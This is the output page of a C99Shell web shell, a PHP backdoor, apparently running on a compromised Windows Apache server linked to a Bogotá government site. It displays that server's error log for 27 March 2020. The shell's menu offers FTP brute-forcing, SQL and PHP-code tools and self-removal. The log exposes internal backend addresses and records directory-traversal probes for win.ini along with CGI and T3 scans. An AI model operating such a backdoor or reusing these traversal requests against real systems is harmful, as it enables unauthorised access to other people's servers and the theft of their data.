!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2020.03.27.log (33.64 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Fri Mar 27 00:41:46.771105 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 01:10:38.452147 2020] [proxy:error] [pid 12936:tid 18752] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Fri Mar 27 01:10:38.452147 2020] [proxy:error] [pid 12936:tid 18752] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Fri Mar 27 01:10:38.452147 2020] [proxy_http:error] [pid 12936:tid 18752] [client 152.61.192.232:41715] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Fri Mar 27 01:10:38.686147 2020] [proxy:error] [pid 12936:tid 18752] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Mar 27 01:10:38.935748 2020] [proxy:error] [pid 12936:tid 18752] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Mar 27 01:29:51.699772 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 02:07:17.198916 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 02:15:35.806992 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 02:48:46.198888 2020] [proxy:error] [pid 12936:tid 18680] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.144:80 (172.22.1.144) failed
[Fri Mar 27 02:48:46.198888 2020] [proxy:error] [pid 12936:tid 18680] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.144) for 60s
[Fri Mar 27 02:48:46.198888 2020] [proxy_http:error] [pid 12936:tid 18680] [client 66.249.66.92:44491] AH01114: HTTP: failed to make connection to backend: 172.22.1.144
[Fri Mar 27 03:00:52.302163 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 03:02:35.121944 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 03:15:37.900119 2020] [proxy:error] [pid 12936:tid 18232] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Fri Mar 27 03:15:37.900119 2020] [proxy:error] [pid 12936:tid 18232] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Fri Mar 27 03:15:37.900119 2020] [proxy_http:error] [pid 12936:tid 18232] [client 152.61.128.50:60499] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Fri Mar 27 03:15:38.134119 2020] [proxy:error] [pid 12936:tid 18232] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Mar 27 03:15:38.383720 2020] [proxy:error] [pid 12936:tid 18232] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Mar 27 03:27:42.365391 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 03:28:06.249033 2020] [core:error] [pid 12936:tid 17612] (20024)The given path is misformatted or contained invalid characters: [client 1.237.177.12:18347] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://ambientebogota.gov.co
[Fri Mar 27 03:48:54.500826 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 03:58:18.551016 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 04:52:02.000278 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 06:46:30.255541 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 07:11:56.640222 2020] [core:error] [pid 12936:tid 18724] (20024)The given path is misformatted or contained invalid characters: [client 199.47.87.140:53430] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Fri Mar 27 07:13:40.255604 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 07:14:13.608463 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 07:20:47.852355 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 07:56:24.510108 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 07:56:25.898511 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 08:26:18.263659 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 08:34:37.792136 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 08:34:45.248949 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 08:57:34.915755 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 09:15:41.598064 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 09:52:09.080706 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 10:28:03.647290 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 10:28:49.729771 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 10:40:59.265052 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:06:27.974137 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:20:44.774442 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:20:48.814849 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:20:52.777256 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:20:56.786463 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:25:11.441311 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:29:11.276132 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 11:39:20.956403 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 12:20:41.937960 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 12:41:31.047754 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 13:08:13.747769 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 13:42:08.381343 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 13:43:02.357438 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 13:48:35.667623 2020] [proxy_http:error] [pid 12936:tid 18988] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57170] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Mar 27 13:48:35.667623 2020] [proxy:error] [pid 12936:tid 18988] [client 201.245.192.253:57170] AH00898: Error reading from remote server returned by /sipse/faces/autenticacion.xhtml, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Mar 27 13:48:35.667623 2020] [proxy_http:error] [pid 12936:tid 18528] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:49202] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/faces/faces/faces/autenticacion.xhtml
[Fri Mar 27 13:48:35.667623 2020] [proxy:error] [pid 12936:tid 18528] [client 201.245.192.253:49202] AH00898: Error reading from remote server returned by /sipse/faces/autenticacion.xhtml, referer: http://190.27.245.106/sipse/faces/faces/faces/faces/autenticacion.xhtml
[Fri Mar 27 13:48:36.697225 2020] [proxy:error] [pid 12936:tid 18988] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Fri Mar 27 13:48:36.697225 2020] [proxy:error] [pid 12936:tid 18988] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Fri Mar 27 13:48:36.697225 2020] [proxy_http:error] [pid 12936:tid 18988] [client 201.245.192.253:57170] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Mar 27 13:48:36.728425 2020] [proxy:error] [pid 12936:tid 18528] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Fri Mar 27 13:48:36.728425 2020] [proxy_http:error] [pid 12936:tid 18528] [client 201.245.192.253:49202] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/faces/faces/faces/faces/autenticacion.xhtml
[Fri Mar 27 13:48:37.773627 2020] [proxy:error] [pid 12936:tid 18528] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Fri Mar 27 13:48:37.773627 2020] [proxy:error] [pid 12936:tid 18528] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Fri Mar 27 13:48:37.773627 2020] [proxy_http:error] [pid 12936:tid 18528] [client 201.245.192.253:49203] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/faces/faces/faces/faces/autenticacion.xhtml
[Fri Mar 27 13:48:37.789227 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.804827 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.820427 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.836027 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.867227 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.882827 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.898427 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.929627 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.945227 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.960827 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.976427 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:37.992027 2020] [proxy:error] [pid 12936:tid 18528] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 13:48:43.218036 2020] [proxy:error] [pid 12936:tid 18300] AH00940: HTTP: disabled connection for (172.22.1.61)
[Fri Mar 27 15:06:57.578282 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 15:10:23.592244 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 15:36:18.852575 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 16:04:30.425946 2020] [proxy:error] [pid 12936:tid 18640] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.144:80 (172.22.1.144) failed
[Fri Mar 27 16:04:30.425946 2020] [proxy:error] [pid 12936:tid 18640] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.144) for 60s
[Fri Mar 27 16:04:30.425946 2020] [proxy_http:error] [pid 12936:tid 18640] [client 186.84.89.213:4291] AH01114: HTTP: failed to make connection to backend: 172.22.1.144, referer: http://190.27.245.106/svr-ciudadano/?
[Fri Mar 27 16:04:38.413160 2020] [proxy:error] [pid 12936:tid 18148] AH00940: HTTP: disabled connection for (172.22.1.144)
[Fri Mar 27 16:38:37.461542 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 16:38:37.461542 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 17:49:05.724168 2020] [proxy:error] [pid 12936:tid 19024] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Fri Mar 27 17:49:05.724168 2020] [proxy:error] [pid 12936:tid 19024] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Fri Mar 27 17:49:05.724168 2020] [proxy_http:error] [pid 12936:tid 19024] [client 201.245.192.253:64291] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Fri Mar 27 18:08:12.903383 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 18:08:43.432637 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 18:24:44.019924 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 18:31:26.516231 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 18:41:53.512532 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 19:26:18.839614 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 19:35:10.566548 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 21:34:17.937501 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:47:53.010456 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:03.041274 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:04.039675 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:04.538876 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:05.038077 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:05.537278 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:06.535680 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:08.033282 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:19.920503 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:20.419704 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:20.918905 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:21.917307 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:22.416508 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:23.430509 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:56.674168 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:48:56.674168 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:49:18.015005 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:49:28.794624 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:49:28.810224 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:50:35.812342 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:50:37.060344 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:52:59.504194 2020] [core:error] [pid 12936:tid 17048] (20025)The given path contained wildcard characters: [client 172.22.2.1:11702] AH00036: access to * failed (filesystem path 'E:/nuevo/htdocs/*')
[Fri Mar 27 22:52:59.613394 2020] [core:error] [pid 12936:tid 17048] (20025)The given path contained wildcard characters: [client 172.22.2.1:11704] AH00036: access to * failed (filesystem path 'E:/nuevo/htdocs/*')
[Fri Mar 27 22:53:20.189831 2020] [core:error] [pid 12936:tid 18360] [client 172.22.2.1:11951] AH00135: Invalid method in request MSIFRQ / HTTP/1.1
[Fri Mar 27 22:53:21.531433 2020] [core:error] [pid 12936:tid 18324] [client 172.22.2.1:11959] AH00126: Invalid URI in request some invalid request
[Fri Mar 27 22:53:22.919835 2020] [core:error] [pid 12936:tid 18688] [client 172.22.2.1:11963] AH00126: Invalid URI in request some invalid request
[Fri Mar 27 22:53:33.231453 2020] [core:error] [pid 12936:tid 18324] [client 172.22.2.1:11981] AH00126: Invalid URI in request GNUTELLA CONNECT/0.6
[Fri Mar 27 22:53:33.418654 2020] [core:error] [pid 12936:tid 18324] [client 172.22.2.1:11982] AH00126: Invalid URI in request GNUTELLA CONNECT/0.4
[Fri Mar 27 22:53:33.605854 2020] [core:error] [pid 12936:tid 18688] [client 172.22.2.1:11984] AH00126: Invalid URI in request GNUTELLA CONNECT/0.6
[Fri Mar 27 22:53:33.871055 2020] [core:error] [pid 12936:tid 18792] [client 172.22.2.1:11987] AH00126: Invalid URI in request GNUTELLA CONNECT/0.4
[Fri Mar 27 22:53:48.191880 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:11999] script not found or unable to stat: E:/nuevo/htdocs/mEvDCwF9Qn6d.cgi
[Fri Mar 27 22:54:12.761923 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/htdocs/mEvDCwF9Qn6d.pl
[Fri Mar 27 22:54:29.875153 2020] [core:error] [pid 12936:tid 18792] [client 172.22.2.1:12111] AH00126: Invalid URI in request t3 12.2.1
[Fri Mar 27 22:54:34.367961 2020] [core:error] [pid 12936:tid 18988] [client 172.22.2.1:12129] AH00126: Invalid URI in request t3 12.2.1
[Fri Mar 27 22:54:39.079169 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/htdocs/mEvDCwF9Qn6d.asp
[Fri Mar 27 22:55:21.433244 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.html
[Fri Mar 27 22:55:27.985255 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.cgi
[Fri Mar 27 22:55:35.254868 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.sh
[Fri Mar 27 22:55:48.670891 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.pl
[Fri Mar 27 22:55:55.581703 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.inc
[Fri Mar 27 22:56:02.820116 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.shtml
[Fri Mar 27 22:56:11.540532 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.asp
[Fri Mar 27 22:56:17.328142 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.php
[Fri Mar 27 22:56:21.025348 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.php3
[Fri Mar 27 22:56:27.967360 2020] [cgi:error] [pid 12936:tid 18328] [client 172.22.2.1:12050] script not found or unable to stat: E:/nuevo/cgi-bin/mEvDCwF9Qn6d.cfm
[Fri Mar 27 22:57:29.197468 2020] [core:error] [pid 12936:tid 18292] [client 172.22.2.1:12507] AH00126: Invalid URI in request GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
[Fri Mar 27 22:57:29.837069 2020] [core:error] [pid 12936:tid 18292] [client 172.22.2.1:12511] AH00126: Invalid URI in request GET /../../../../../../../../../../../../winnt/win.ini HTTP/1.1
[Fri Mar 27 22:57:30.242670 2020] [core:error] [pid 12936:tid 18632] [client 172.22.2.1:12513] AH00126: Invalid URI in request GET ../../../../../../../../../../../../windows/win.ini HTTP/1.1
[Fri Mar 27 22:57:30.632670 2020] [core:error] [pid 12936:tid 18632] [client 172.22.2.1:12516] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
[Fri Mar 27 22:57:31.334672 2020] [core:error] [pid 12936:tid 18632] [client 172.22.2.1:12519] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Fri Mar 27 22:57:31.475072 2020] [core:error] [pid 12936:tid 18388] [client 172.22.2.1:12522] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
[Fri Mar 27 22:57:31.709072 2020] [core:error] [pid 12936:tid 18632] [client 172.22.2.1:12523] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Fri Mar 27 22:57:32.208273 2020] [core:error] [pid 12936:tid 17048] [client 172.22.2.1:12527] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
[Fri Mar 27 22:57:34.470277 2020] [core:error] [pid 12936:tid 17048] [client 172.22.2.1:12540] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Fri Mar 27 22:57:35.172278 2020] [core:error] [pid 12936:tid 17048] [client 172.22.2.1:12543] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
